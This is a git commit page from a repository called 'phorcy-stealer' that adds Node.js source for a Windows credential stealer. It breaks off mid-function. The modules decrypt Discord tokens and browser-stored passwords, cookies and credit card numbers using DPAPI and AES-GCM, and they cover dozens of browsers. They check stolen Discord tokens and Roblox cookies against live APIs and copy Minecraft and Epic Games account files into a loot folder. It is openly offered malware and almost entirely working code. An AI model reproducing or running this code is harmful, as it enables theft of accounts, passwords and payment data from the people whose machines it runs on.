whiskers/phorcy-stealer
4
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Full refactor/better docs

Browse Source
This commit is contained in:
unknown
2026-02-01 04:09:42 +01:00
parent 008a8cea98
commit 0b60404558
76 changed files with 1566 additions and 767 deletions
Download Patch File Download Diff File Expand all files Collapse all files

0
main/base/main.js Normal file
View File

1
main/base/modules/Combined.js Normal file
View File

@@ -0,0 +1 @@

238
main/base/modules/Discord.js Normal file
View File

@@ -0,0 +1,238 @@
// Coded by syntheticuhh
// t.me/Phorcy
const fs = require("fs");
const dpapi = require("win-dpapi");
const crypto = require("crypto");
const axios = require("axios");
class D { // discord class
constructor(u, d, i, n, b, bill, e, ph, t, av, bio) {
this.u = u;
this.tag = `${u}#${d}`;
this.id = i;
this.n = n;
this.bad = b;
this.bil = bill;
this.em = e;
this.ph = ph || "None";
this.bio = bio ? bio.replace(/\n/gm, "\\n") : "None";
this.t = t;
this.av = `https://cdn.discordapp.com/avatars/${i}/${av}.png`;
}
static async gP(t) { // get payment function
try {
const r = await axios.get(`https://canary.discord.com/api/v9/users/@me/billing/payment-sources`, {
headers: { "Authorization": t }
});
const v = r.data.filter(p => p.type === 1 && !p.invalid);
if (v.length > 0) {
return v.map(p => "Credit Card ✔️").join(" ");
} else {
return "Paypal Account Connected";
}
} catch (e) {
return "`No Card They Are Broke`";
}
}
static async gA(tokens) { // get accounts
const a = [];
for (const t of tokens) {
try {
const r = await axios.get(`https://discord.com/api/v9/users/@me`, {
headers: { "Authorization": t }
});
const j = r.data;
if (!j.message) {
a.push(new D(
j.username, j.discriminator, j.id,
D.hN(j), D.gBI(j),
await D.gP(t),
j.email, j.phone, t, j.avatar, j.bio
));
}
} catch (e) {
continue;
}
}
return a;
}
static hN(j) { // has nitro func
return j["premium_type"] !== undefined && j["premium_type"] !== null ? "True" : "False";
}
static gBI(j) { // get badges
const bL = [
{ name: "N/A", flag: 0 },
{ name: "Staff", flag: 1 },
{ name: "Partner", flag: 2 },
{ name: "HypeSquad Events", flag: 4 },
{ name: "Bug Hunter Level 1", flag: 8 },
{ name: "Bravery", flag: 64 },
{ name: "Brilliance", flag: 128 },
{ name: "Balance", flag: 256 },
{ name: "Early Supporter", flag: 512 },
{ name: "Bug Hunter Level 2", flag: 16384 },
{ name: "Developer", flag: 131072 },
{ name: "Active Developer", flag: 4194304 }
];
const fV = j["flags"];
const bR = bL
.filter(badge => (fV & badge.flag) === badge.flag)
.map(badge => badge.name);
return bR.length > 0 ? bR.join(", ") : "None";
}
}
function gMK(bP) { // get masterkey
const mKP = `${bP}\\Local State`;
const eK = Buffer.from(JSON.parse(fs.readFileSync(mKP, "utf-8")).os_crypt.encrypted_key, "base64").slice(5);
const dK = dpapi.unprotectData(Buffer.from(eK, "utf-8"), null, 'CurrentUser');
return dK;
}
function gET(bP) { // get encrypted token
const lP = `${bP}\\Local Storage\\leveldb\\`;
if (!fs.existsSync(lP)) {
return [];
}
const f = fs.readdirSync(lP);
const eR = /dQw4w9WgXcQ:[^\"]*/gm;
const uET = f
.filter(file => file.endsWith(".log") || file.endsWith(".ldb"))
.flatMap(file => {
const content = fs.readFileSync(`${lP}${file}`, "utf-8");
return content.match(eR) || [];
})
.filter((item, pos, self) => self.indexOf(item) === pos)
.filter(el => el !== null);
return uET;
}
function dUT(eT, mK) { // decrypt tokens
const dT = eT.map(eT => {
try {
const tD = Buffer.from(eT.split('dQw4w9WgXcQ:')[1], "base64");
const sP = tD.slice(3, 15);
const mP = tD.slice(15, -16);
const eP = tD.slice(-16);
const d = crypto.createDecipheriv('aes-256-gcm', mK, sP);
d.setAuthTag(eP);
return d.update(mP, 'base64', 'utf-8') + d.final('utf-8');
} catch (e) {
return null;
}
});
return dT.filter(t => t !== null);
}
function dUP(bP, p) { // decrypt users
const pP = `${bP}\\${p}`;
return fs.existsSync(pP) ? fs.readdirSync(pP).map(p => ({ p: `${pP}\\${p}` })) : [];
}
async function fD() { // get da data
const aP = process.env.APPDATA;
const lP = process.env.LOCALAPPDATA;
const dP = [`${aP}\\discord`, `${aP}\\discordcanary`, `${aP}\\discordptb`];
let t = [];
for (const p of dP) {
if (fs.existsSync(p)) {
const eT = gET(p);
const mK = gMK(p);
t = t.concat(dUT(eT, mK));
}
}
const bP = [ // browser paths
`${aP}\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\`,
`${aP}\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\`,
`${lP}\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\`,
`${lP}\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\`,
`${lP}\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\`,
`${lP}\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\`,
`${lP}\\CentBrowser\\User Data\\Local Storage\\leveldb\\`,
`${lP}\\Orbitum\\User Data\\Local Storage\\leveldb\\`,
`${lP}\\Kometa\\User Data\\Local Storage\\leveldb\\`,
`${lP}\\Torch\\User Data\\Local Storage\\leveldb\\`,
`${lP}\\Amigo\\User Data\\Local Storage\\leveldb\\`,
`${lP}\\BraveSoftware\\Brave-Browser\\User Data\\%PROFILE%\\Local Storage\\leveldb\\`,
`${lP}\\Iridium\\User Data\\%PROFILE%\\Local Storage\\leveldb\\`,
`${lP}\\Yandex\\YandexBrowser\\User Data\\%PROFILE%\\Local Storage\\leveldb\\`,
`${lP}\\uCozMedia\\Uran\\User Data\\%PROFILE%\\Local Storage\\leveldb\\`,
`${lP}\\Microsoft\\Edge\\User Data\\%PROFILE%\\Local Storage\\leveldb\\`,
`${lP}\\Google\\Chrome\\User Data\\%PROFILE%\\Local Storage\\leveldb\\`,
`${lP}\\Vivaldi\\User Data\\%PROFILE%\\Local Storage\\leveldb\\`,
];
const bPr = bP // browser profiles
.flatMap(b => dUP(b, b.split("\\")[6])
.map(p => p.p));
const cR = [ // regex
new RegExp(Buffer.from("W1x3LV17MjR9XC5bXHctXXs2fVwuW1x3LV17Mjd9", 'base64').toString(), 'gm'),
new RegExp(Buffer.from("bWZhXC5bXHctXXs4NH0=", 'base64').toString(), 'gm'),
new RegExp(Buffer.from("W1x3LV17MjR9XC5bXHctXXs2fVwuW1x3LV17MjUsMTEwfQ==", 'base64').toString(), 'gm')
];
const tFP = bPr // token profile browser profile
.filter(p => fs.existsSync(p))
.flatMap(p => fs.readdirSync(p)
.filter(file => file.endsWith(".log") || file.endsWith(".ldb"))
.flatMap(file => cR.flatMap(reg => {
const content = fs.readFileSync(`${p}${file}`, "utf-8");
return content.match(reg) || [];
}))
)
.filter((item, pos, self) => self.indexOf(item) === pos && item !== null);
t = [...new Set(t.concat(tFP))];
return await D.gA(t);
}
function stxt(a) { // save to txt
const fD = a.map(a => {
return ` Discord DATA ~ t.me/phorcy
======================================================
| Username > ${a.u}
|
| Userid > ${a.id}
|
| Email > ${a.em}
|
| Phone > ${a.ph}
|
| Badges > ${a.bad}
|
| Billing > ${a.bil}
|
| Nitro > ${a.n}
|
| Bio > ${a.bio}
|
| Token > ${a.t}
|
======================================================`;
});
fs.writeFileSync('discord.txt', fD.join('\n\n'), 'utf-8');
}
(async () => {
const a = await fD();
stxt(a);
})();

33
main/base/modules/EpicGames.js Normal file
View File

@@ -0,0 +1,33 @@
const fsp = require('fs').promises;
const path = require('path');
const config = {
mainfold: 'PHORCY-DATA',
local: process.env.LOCALAPPDATA || '',
};
async function seg(config) {
try {
const eP = path.join(config.local, 'EpicGamesLauncher', 'Saved', 'Config', 'Windows');
const cpth = path.join(config.mainfold, 'Socials', 'EPICGAMES');
await fsp.mkdir(cpth, { recursive: true });
const ftc = [
'Compat.ini',
'DeviceProfiles.ini',
'Engine.ini',
'Game.ini',
'GameUserSettings.ini',
'Hardware.ini',
'Input.ini',
'Lightmass.ini',
'PortalRegions.ini',
'RuntimeOptions.ini',
];
await Promise.all(ftc.map(async (file) => {
const sfp = path.join(eP, file);
const dfp = path.join(cpth, file);
await fsp.copyFile(sfp, dfp);
}));
} catch (error) {
}
}
seg(config);

19
main/base/modules/Folder.js Normal file
View File

@@ -0,0 +1,19 @@
const fs = require('fs');
function genrandomstr(length) {
const letter = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
let answer = '';
for (let i = 0; i < length; i++) {
answer += letter.charAt(Math.floor(Math.random() * letter.length));
}
return answer;
}
function cfold() {
const randomstr = genrandomstr(7);
const main = `PHORCY-DATA-${randomstr}`;
const sub = ['Discord', 'Browsers', 'System', 'Socials', 'Wallets'];
fs.mkdirSync(main);
sub.forEach(sub => {
fs.mkdirSync(`${main}/${sub}`);
});
}
cfold();

26
main/base/modules/Minecraft.js Normal file
View File

@@ -0,0 +1,26 @@
const fs = require('fs');
const fsp = require('fs').promises;
const path = require('path');
async function minecraft() {
const mcf = path.join(process.env.APPDATA, '.minecraft');
const forward = path.join('PHORCY-DATA', 'Socials', 'Minecraft');
try {
const backupfiles = ['launcher_accounts.json', 'usercache.json', 'launcher_profiles.json', 'launcher_log.txt'];
const existing = backupfiles.some(file => fs.existsSync(path.join(mcf, file)));
if (existing) {
await fsp.mkdir(forward, { recursive: true });
for (const file of backupfiles) {
const src = path.join(mcf, file);
const dest = path.join(forward, file);
try {
await fsp.copyFile(src, dest);
} catch (err) {
}
}
} else { // looks weird cuz i had error handling here before
}
} catch (e) {
}
}
minecraft();

624
main/base/modules/browser-stealer.js Normal file
View File

@@ -0,0 +1,624 @@
const fs = require('fs');
const sqlite3 = require('sqlite3').verbose();
const crypto = require('crypto')
const path = require('path')
const dpapi = require('./node-dpapi');
const axios = require('axios');
class BrowserStealing {
constructor() {
this.local = process.env.LOCALAPPDATA
this.roaming = process.env.APPDATA
this.phorcyDir = path.join(this.roaming, 'Phorcy');
//this.browserPaths = [path.join(this.local, 'Google', 'Chrome', 'User Data'), path.join(this.local, 'Thorium', 'User Data')];
this.browserPaths = [
path.join(this.local, 'Opera Software', 'Opera Neon', 'User Data', 'Default'),
path.join(this.local, 'Opera Software', 'Opera Stable'),
path.join(this.local, 'Opera Software', 'Opera GX Stable'),
path.join(this.local, 'Amigo', 'User Data'),
path.join(this.local, 'Torch', 'User Data'),
path.join(this.local, 'Kometa', 'User Data'),
path.join(this.local, 'Orbitum', 'User Data'),
path.join(this.local, 'CentBrowser', 'User Data'),
path.join(this.local, '7Star', '7Star', 'User Data'),
path.join(this.local, 'Sputnik', 'Sputnik', 'User Data'),
path.join(this.local, 'Vivaldi', 'User Data'),
path.join(this.local, 'Google', 'Chrome SxS', 'User Data'),
path.join(this.local, 'Google', 'Chrome', 'User Data'),
path.join(this.local, 'Epic Privacy Browser', 'User Data'),
path.join(this.local, 'Microsoft', 'Edge', 'User Data'),
path.join(this.local, 'uCozMedia', 'Uran', 'User Data'),
path.join(this.local, 'Yandex', 'YandexBrowser', 'User Data'),
path.join(this.local, 'BraveSoftware', 'Brave-Browser', 'User Data'),
path.join(this.local, 'Iridium', 'User Data'),
path.join(this.local, 'Google', 'Chrome Beta', 'User Data'),
path.join(this.local, 'Google', 'Chrome SxS', 'User Data'),
path.join(this.local, 'Slimjet', 'User Data'),
path.join(this.local, 'Maxthon3', 'User Data'),
path.join(this.local, 'Thorium', 'User Data'),
path.join(this.local, 'AVAST Software', 'Avast Secure Browser', 'User Data'),
path.join(this.local, '8pecxstudios', 'Cyberfox', 'User Data'),
path.join(this.local, 'Waterfox', 'Profiles'),
path.join(this.local, 'Moonchild Productions', 'Pale Moon', 'Profiles'),
path.join(this.local, 'Comodo', 'Dragon', 'User Data'),
path.join(this.local, 'Coowon', 'User Data'),
path.join(this.local, 'GNU', 'IceCat', 'Profiles'),
path.join(this.local, 'Moonchild Productions', 'Basilisk', 'Profiles'),
path.join(this.local, 'Otter', 'Browser', 'User Data'),
path.join(this.local, 'WebDir', 'Opium', 'User Data'),
path.join(this.local, 'Comodo', 'Chromodo', 'User Data'),
path.join(this.local, 'Yandex', 'YandexBrowserBeta', 'User Data'),
path.join(this.local, 'SRWare Iron', 'User Data'),
path.join(this.local, 'Otter', 'Browser', 'User Data'),
path.join(this.local, 'Coowon', 'User Data'),
path.join(this.local, 'qutebrowser'),
path.join(this.local, 'Microsoft', 'Edge SxS', 'User Data'),
path.join(this.local, 'VivaldiSnapshot', 'User Data'),
path.join(this.local, 'Otter', 'Browser', 'User Data'),
path.join(this.local, 'Coowon', 'User Data'),
path.join(this.local, 'qutebrowser'),
path.join(this.local, 'Microsoft', 'Edge SxS', 'User Data'),
path.join(this.local, 'VivaldiSnapshot', 'User Data'),
];
this.browserProfiles = ['Default', 'Profile 1', 'Profile 2', 'Profile 3', 'Profile 4', 'Profile 5'];
this.tempDir = path.join(this.local, 'Temp');
//this.password_command = 'SELECT action_url, username_value, password_value FROM logins;';
this.password_command = 'SELECT * FROM logins;';
this.cookie_command = 'SELECT * FROM cookies;';
this.cc_command = 'SELECT * FROM credit_cards;';
this.history_command = 'SELECT * FROM urls;';
this.downloads_command = 'SELECT * FROM downloads;';
this.autofill_command = 'SELECT * FROM autofill;';
this.passwordFile = path.join(this.phorcyDir, 'browser_passwords.txt');
this.cookieFile = path.join(this.phorcyDir, 'browser_cookies.txt');
this.ccFile = path.join(this.phorcyDir, 'browser_creditcards.txt');
this.historyFile = path.join(this.phorcyDir, 'browser_history.txt');
this.downloadsFile = path.join(this.phorcyDir, 'browser_downloads.txt');
this.bookmarkFile = path.join(this.phorcyDir, 'browser_bookmarks.txt');
this.autofillFile = path.join(this.phorcyDir, 'browser_autofill.txt');
this.robloxFile = path.join(this.phorcyDir, 'roblox_cookies.txt');
this.password_count = 0;
this.cookie_count = 0;
this.cc_count = 0;
this.history_count = 0;
this.downloads_count = 0;
this.bookmark_count = 0;
this.autofill_count = 0;
this.roblox_count = 0;
}
generateRandomString() {
const randomCharacter = () => Math.random().toString(36).substring(2, 3).toUpperCase();
return `${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}-${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}-${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}`;
}
getDate(value) {
const date = new Date(value / 1000);
return date;
}
decipher(masterKey, value) {
let first = value.slice(3, 15),
middle = value.slice(15, value.length - 16),
end = value.slice(value.length - 16, value.length);
let decipher = crypto.createDecipheriv("aes-256-gcm", masterKey, first);
decipher.setAuthTag(end);
let decrypted = decipher.update(middle, "base64", "utf-8") + decipher.final("utf-8");
return decrypted;
}
fileExists(filePath) {
try {
fs.accessSync(filePath, fs.constants.F_OK);
return true;
} catch (err) {
return false;
}
}
async getKey(local_stateFile, callback) {
fs.readFile(local_stateFile, 'utf8', (err, data) => {
if (err) {
console.error(err);
return;
}
const encryptedKey = Buffer.from(JSON.parse(data).os_crypt.encrypted_key, 'base64').slice(5);
const decryptedKey = dpapi.unprotectData(encryptedKey, null, "CurrentUser");
console.log('Decryption Key:', decryptedKey);
//return decryptedKey;
callback(null, decryptedKey);
});
}
async getPassword(loginFile, masterKey) {
const tempFile = path.join(this.tempDir, `${this.generateRandomString()}.phorcy`);
fs.copyFile(loginFile, tempFile, (err) => {
if (err) {
console.error(err);
}
const db = new sqlite3.Database(tempFile, sqlite3.OPEN_READWRITE, (err) => {
if (err) {
console.error(err);
return;
}
db.all(this.password_command, (err, rows) => {
if (err) {
console.error(err);
} else {
rows.map(row => {
//console.log(row);
if (row && row['password_value']) {
this.password_count++;
try {
//const passwordList = `${masterKey.toString('hex')}\t${row['origin_url']}\t${row['action_url']}\t${row['username_element']}\t${row['username_value']}\t${row['password_element']}\t${this.decipher(masterKey, row['password_value'])}\t${row['submit_element']}\t${row['signon_realm']}\t${this.getDate(parseInt(row['date_created']))}\t${row['blacklisted_by_user']}\t${row['scheme']}\t${row['password_type']}\t${row['times_used']}\t${row['form_data']}\t${row['display_name']}\t${row['icon_url']}\t${row['federation_url']}\t${row['skip_zero_click']}\t${row['generation_upload_status']}\t${row['possible_username_pairs']}\t${row['id']}\t${row[21]}\t${this.getDate(parseInt(row['date_last_used']))}\t${row['moving_blocked_for']}\t${this.getDate(parseInt(row['date_password_modified']))}\t${row['sender_email']}\t${row['sender_name']}\t${row['date_received']}\t${row['sharing_notification_displayed']}\t${row['keychain_identifier']}\n`;
const passwordList = `Master Key: ${masterKey.toString('hex')}\nOrigin URL: ${row['origin_url']}\nAction URL: ${row['action_url']}\nUsername Element: ${row['username_element']}\nUsername Value: ${row['username_value']}\nPassword Element: ${row['password_element']}\nDeciphered Password: ${this.decipher(masterKey, row['password_value'])}\nSubmit Element: ${row['submit_element']}\nSignon Realm: ${row['signon_realm']}\nDate Created: ${this.getDate(parseInt(row['date_created']))}\nBlacklisted by User: ${row['blacklisted_by_user']}\nScheme: ${row['scheme']}\nPassword Type: ${row['password_type']}\nTimes Used: ${row['times_used']}\nForm Data: ${row['form_data']}\nDisplay Name: ${row['display_name']}\nIcon URL: ${row['icon_url']}\nFederation URL: ${row['federation_url']}\nSkip Zero Click: ${row['skip_zero_click']}\nGeneration Upload Status: ${row['generation_upload_status']}\nPossible Username Pairs: ${row['possible_username_pairs']}\nID: ${row['id']}\nRow 21: ${row[21]}\nDate Last Used: ${this.getDate(parseInt(row['date_last_used']))}\nMoving Blocked For: ${row['moving_blocked_for']}\nDate Password Modified: ${this.getDate(parseInt(row['date_password_modified']))}\nSender Email: ${row['sender_email']}\nSender Name: ${row['sender_name']}\nDate Received: ${row['date_received']}\nSharing Notification Displayed: ${row['sharing_notification_displayed']}\nKeychain Identifier: ${row['keychain_identifier']}\n\n`;
fs.writeFileSync(this.passwordFile, passwordList, { flag: 'a' });
} catch (err) {
console.error(err);
}
}
});
}
db.close((err) => {
if (err) {
console.error(err);
}
});
console.log('Password count:', this.password_count)
});
});
});
if (this.fileExists(tempFile)) {
fs.unlink(tempFile, (err) => {
if (err) {
console.error(err);
}
});
}
};
async getCookie(cookieFile, masterKey) {
const tempFile = path.join(this.tempDir, `${this.generateRandomString()}.phorcy`);
fs.copyFile(cookieFile, tempFile, (err) => {
if (err) {
console.error(err);
}
const db = new sqlite3.Database(tempFile, sqlite3.OPEN_READWRITE, (err) => {
if (err) {
console.error(err);
return;
}
db.all(this.cookie_command, (err, rows) => {
if (err) {
console.error(err);
} else {
rows.map(row => {
//console.log(row);
if (row && row['encrypted_value']) {
this.cookie_count++;
try {
//const cookieList = `${masterKey.toString('hex')}\t${this.getDate(parseInt(row['creation_utc']))}\t${row['host_key']}\t${row['top_frame_site_key']}\t${row['name']}\t${row['value']}\t${this.decipher(masterKey, row['encrypted_value'])}\t${row['path']}\t${this.getDate(parseInt(row['expires_utc']))}\t${row['is_secure']}\t${row['is_httponly']}\t${this.getDate(parseInt(row['last_access_utc']))}\t${row['has_expires']}\t${row['is_persistent']}\t${row['priority']}\t${row['samesite']}\t${row['source_scheme']}\t${row['source_port']}\t${row['is_same_party']}\t${this.getDate(parseInt(row['last_update_utc']))}\n`;
const cookieList = `Master Key: ${masterKey.toString('hex')}\nCreation UTC: ${this.getDate(parseInt(row['creation_utc']))}\nHost Key: ${row['host_key']}\nTop Frame Site Key: ${row['top_frame_site_key']}\nName: ${row['name']}\nValue: ${row['value']}\nDeciphered Encrypted Value: ${this.decipher(masterKey, row['encrypted_value'])}\nPath: ${row['path']}\nExpires UTC: ${this.getDate(parseInt(row['expires_utc']))}\nIs Secure: ${row['is_secure']}\nIs HttpOnly: ${row['is_httponly']}\nLast Access UTC: ${this.getDate(parseInt(row['last_access_utc']))}\nHas Expires: ${row['has_expires']}\nIs Persistent: ${row['is_persistent']}\nPriority: ${row['priority']}\nSameSite: ${row['samesite']}\nSource Scheme: ${row['source_scheme']}\nSource Port: ${row['source_port']}\nIs Same Party: ${row['is_same_party']}\nLast Update UTC: ${this.getDate(parseInt(row['last_update_utc']))}\n\n`;
fs.writeFileSync(this.cookieFile, cookieList, { flag: 'a' });
if ('.ROBLOSECURITY' === row.name.toString()) {
this.roblox_count++;
const robloSecurityo = this.decipher(masterKey, row['encrypted_value'])
//console.log(robloSecurityo);
let headers = {
'cookie': `.ROBLOSECURITY=${robloSecurityo};`,
}
axios.get("https://www.roblox.com/mobileapi/userinfo", { headers })
.then(response => {
//console.log(response.data);
if (response.data) {
//let robloxData = `${masterKey.toString('hex')}\t${response.data['username']}\t${response.data['userid']}\t${response.data['robuxbalance']}\t${response.data['ispremium']}\t${robloSecurityo}\n`;
let robloxData = `Master Key: ${masterKey.toString('hex')}\nUsername: ${response.data['username']}\nUser ID: ${response.data['userid']}\nRobux Balance: ${response.data['robuxbalance']}\nIs Premium: ${response.data['ispremium']}\nRoblox Security: ${robloSecurityo}\n\n`;
fs.writeFileSync(this.robloxFile, robloxData, { flag: 'a' });
}
})
.catch(err => {
console.error(err);
});
}
} catch (err) {
console.error(err);
}
}
});
}
db.close((err) => {
if (err) {
console.error(err);
}
});
console.log('Cookie count:', this.cookie_count);
console.log('Roblox count:', this.roblox_count);
});
});
});
if (this.fileExists(tempFile)) {
fs.unlink(tempFile, (err) => {
if (err) {
console.error(err);
}
});
}
};
async getCreditCard(ccFile, masterKey) {
const tempFile = path.join(this.tempDir, `${this.generateRandomString()}.phorcy`);
fs.copyFile(ccFile, tempFile, (err) => {
if (err) {
console.error(err);
}
const db = new sqlite3.Database(tempFile, sqlite3.OPEN_READWRITE, (err) => {
if (err) {
console.error(err);
return;
}
db.all(this.cc_command, (err, rows) => {
if (err) {
console.error(err);
} else {
rows.map(row => {
//console.log(row);
if (row && row['card_number_encrypted']) {
this.cc_count++;
try {
//const ccList = `${masterKey.toString('hex')}\t${row['guid']}\t${row['name_on_card']}\t${row['expiration_month']}/${row['expiration_year']}\t${this.decipher(masterKey, row['card_number_encrypted'])}\t${this.getDate(parseInt(row['date_modified']))}\t${row['origin']}\t${row['use_count']}\t${this.getDate(parseInt(row['use_date']))}\t${row['billing_adress_id']}\t${row['nickname']}\n`;
const ccList = `Master Key: ${masterKey.toString('hex')}\nGUID: ${row['guid']}\nName on Card: ${row['name_on_card']}\nExpiration Date: ${row['expiration_month']}/${row['expiration_year']}\nDeciphered Card Number: ${this.decipher(masterKey, row['card_number_encrypted'])}\nDate Modified: ${this.getDate(parseInt(row['date_modified']))}\nOrigin: ${row['origin']}\nUse Count: ${row['use_count']}\nUse Date: ${this.getDate(parseInt(row['use_date']))}\nBilling Address ID: ${row['billing_adress_id']}\nNickname: ${row['nickname']}\n\n`;
fs.writeFileSync(this.ccFile, ccList, { flag: 'a' });
} catch (err) {
console.error(err);
}
}
});
}
db.close((err) => {
if (err) {
console.error(err);
}
});
console.log('Credit Card count:', this.cc_count)
});
});
});
if (this.fileExists(tempFile)) {
fs.unlink(tempFile, (err) => {
if (err) {
console.error(err);
}
});
}
};
async getHistory(historyFile) {
const tempFile = path.join(this.tempDir, `${this.generateRandomString()}.phorcy`);
fs.copyFile(historyFile, tempFile, (err) => {
if (err) {
console.error(err);
}
const db = new sqlite3.Database(tempFile, sqlite3.OPEN_READWRITE, (err) => {
if (err) {
console.error(err);
return;
}
db.all(this.history_command, (err, rows) => {
if (err) {
console.error(err);
} else {
rows.map(row => {
//console.log(row);
if (row && row['url']) {
this.history_count++;
try {
//const historyList = `${row['id']}\t${row['url']}\t${row['title']}\t${row['visit_count']}\t${row['typed_count']}\t${this.getDate(parseInt(row['last_visit_time']))}\t${row['hidden']}\n`;
const historyList = `ID: ${row['id']}\nURL: ${row['url']}\nTitle: ${row['title']}\nVisit Count: ${row['visit_count']}\nTyped Count: ${row['typed_count']}\nLast Visit Time: ${this.getDate(parseInt(row['last_visit_time']))}\nHidden: ${row['hidden']}\n\n`;
fs.writeFileSync(this.historyFile, historyList, { flag: 'a' });
} catch (err) {
console.error(err);
}
}
});
}
db.close((err) => {
if (err) {
console.error(err);
}
});
console.log('History count:', this.history_count)
});
});
});
if (this.fileExists(tempFile)) {
fs.unlink(tempFile, (err) => {
if (err) {
console.error(err);
}
});
}
};
async getDownload(downloadFile) {
const tempFile = path.join(this.tempDir, `${this.generateRandomString()}.phorcy`);
fs.copyFile(downloadFile, tempFile, (err) => {
if (err) {
console.error(err);
}
const db = new sqlite3.Database(tempFile, sqlite3.OPEN_READWRITE, (err) => {
if (err) {
console.error(err);
return;
}
db.all(this.downloads_command, (err, rows) => {
if (err) {
console.error(err);
} else {
rows.map(row => {
//console.log(row);
if (row && row['tab_url']) {
this.downloads_count++;
try {
//const downloadsList = `${row['id']}\t${row['guid']}\t${row['current_path']}\t${row['target_path']}\t${this.getDate(parseInt(row['start_time']))}\t${row['received_bytes']}\t${row['total_bytes']}\t${row['state']}\t${row['danger_type']}\t${row['interrupt_reason']}\t${row['hash']}\t${row[this.getDate(parseInt(row['end_time']))]}\t${row['opened']}\t${this.getDate(parseInt(row['last_access_time']))}\t${row['transient']}\t${row['referrer']}\t${row['site_url']}\t${row['embedder_download_data']}\t${row['tab_url']}\t${row['tab_referrer_url']}\t${row['http_method']}\t${row['by_ext_id']}\t${row['by_ext_name']}\t${row['by_web_app_id']}\t${row['etag']}\t${row['last_modified']}\t${row['mime_type']}\t${row['original_mime_type']}\n`;
const downloadsList = `ID: ${row['id']}\nGUID: ${row['guid']}\nCurrent Path: ${row['current_path']}\nTarget Path: ${row['target_path']}\nStart Time: ${this.getDate(parseInt(row['start_time']))}\nReceived Bytes: ${row['received_bytes']}\nTotal Bytes: ${row['total_bytes']}\nState: ${row['state']}\nDanger Type: ${row['danger_type']}\nInterrupt Reason: ${row['interrupt_reason']}\nHash: ${row['hash']}\nEnd Time: ${this.getDate(parseInt(row['end_time']))}\nOpened: ${row['opened']}\nLast Access Time: ${this.getDate(parseInt(row['last_access_time']))}\nTransient: ${row['transient']}\nReferrer: ${row['referrer']}\nSite URL: ${row['site_url']}\nEmbedder Download Data: ${row['embedder_download_data']}\nTab URL: ${row['tab_url']}\nTab Referrer URL: ${row['tab_referrer_url']}\nHTTP Method: ${row['http_method']}\nBy Extension ID: ${row['by_ext_id']}\nBy Extension Name: ${row['by_ext_name']}\nBy Web App ID: ${row['by_web_app_id']}\nETag: ${row['etag']}\nLast Modified: ${row['last_modified']}\nMIME Type: ${row['mime_type']}\nOriginal MIME Type: ${row['original_mime_type']}\n\n`;
fs.writeFileSync(this.downloadsFile, downloadsList, { flag: 'a' });
} catch (err) {
console.error(err);
}
}
});
}
db.close((err) => {
if (err) {
console.error(err);
}
});
console.log('Downloads count:', this.downloads_count)
});
});
});
if (this.fileExists(tempFile)) {
fs.unlink(tempFile, (err) => {
if (err) {
console.error(err);
}
});
}
};
async getBookmark(bookmarkFile) {
const tempFile = path.join(this.tempDir, `${this.generateRandomString()}.phorcy`);
fs.copyFile(bookmarkFile, tempFile, (err) => {
if (err) {
console.error(err);
}
fs.readFile(tempFile, 'utf8', (err, data) => {
if (err) {
console.error(err);
return;
}
let bookmarks = JSON.parse(data).roots.other.children;
//console.log(bookmarks);
try {
for (const item of bookmarks) {
//const bookmarkList = `${this.getDate(parseInt(item['date_added']))}\t${this.getDate(parseInt(item['date_last_used']))}\t${item['guid']}\t${item['id']}\t${item['meta_info']}\t${item['name']}\t${item['type']}\t${item['url']}\n`;
const bookmarkList = `Date Added: ${this.getDate(parseInt(item['date_added']))}\nDate Last Used: ${this.getDate(parseInt(item['date_last_used']))}\nGUID: ${item['guid']}\nID: ${item['id']}\nMeta Info: ${item['meta_info']}\nName: ${item['name']}\nType: ${item['type']}\nURL: ${item['url']}\n\n`;
fs.writeFileSync(this.bookmarkFile, bookmarkList, { flag: 'a' });
this.bookmark_count++;
}
} catch (err) {
console.error(err);
}
console.log('Bookmark count:', this.bookmark_count)
});
});
if (this.fileExists(tempFile)) {
fs.unlink(tempFile, (err) => {
if (err) {
console.error(err);
}
});
}
};
async getAutofill(autofillFile) {
const tempFile = path.join(this.tempDir, `${this.generateRandomString()}.phorcy`);
fs.copyFile(autofillFile, tempFile, (err) => {
if (err) {
console.error(err);
}
const db = new sqlite3.Database(tempFile, sqlite3.OPEN_READWRITE, (err) => {
if (err) {
console.error(err);
return;
}
db.all(this.autofill_command, (err, rows) => {
if (err) {
console.error(err);
} else {
rows.map(row => {
//console.log(row);
if (row && row['value']) {
this.autofill_count++;
try {
//const autofillList = `${row['name']}\t${row['value']}\t${row['value_lower']}\t${this.getDate(parseInt(row['date_created']))}\t${this.getDate(parseInt(row['date_last_used']))}\t${row['count']}\n`;
const autofillList = `Name: ${row['name']}\nValue: ${row['value']}\nLowercase Value: ${row['value_lower']}\nDate Created: ${this.getDate(parseInt(row['date_created']))}\nDate Last Used: ${this.getDate(parseInt(row['date_last_used']))}\nCount: ${row['count']}\n\n`;
fs.writeFileSync(this.autofillFile, autofillList, { flag: 'a' });
} catch (err) {
console.error(err);
}
}
});
}
db.close((err) => {
if (err) {
console.error(err);
}
});
console.log('Autofill count:', this.autofill_count)
});
});
});
if (this.fileExists(tempFile)) {
fs.unlink(tempFile, (err) => {
if (err) {
console.error(err);
}
});
}
};
async Main() {
// dir preparation
if (!this.fileExists(this.phorcyDir)) {
try {
fs.mkdirSync(this.phorcyDir);
} catch (err) {
console.error(err);
}
}
// password, cookie, cc grabber
fs.writeFileSync(this.passwordFile, 't.me/phorcy\n-----------\n\n', { flag: 'a' });
fs.writeFileSync(this.robloxFile, 't.me/phorcy\n-----------\n\n', { flag: 'a' });
fs.writeFileSync(this.cookieFile, 't.me/phorcy\n-----------\n\n', { flag: 'a' });
fs.writeFileSync(this.ccFile, 't.me/phorcy\n-----------\n\n', { flag: 'a' });
for (const browserPath of this.browserPaths) {
if (this.fileExists(browserPath)) {
const localState = path.join(browserPath, 'Local State');
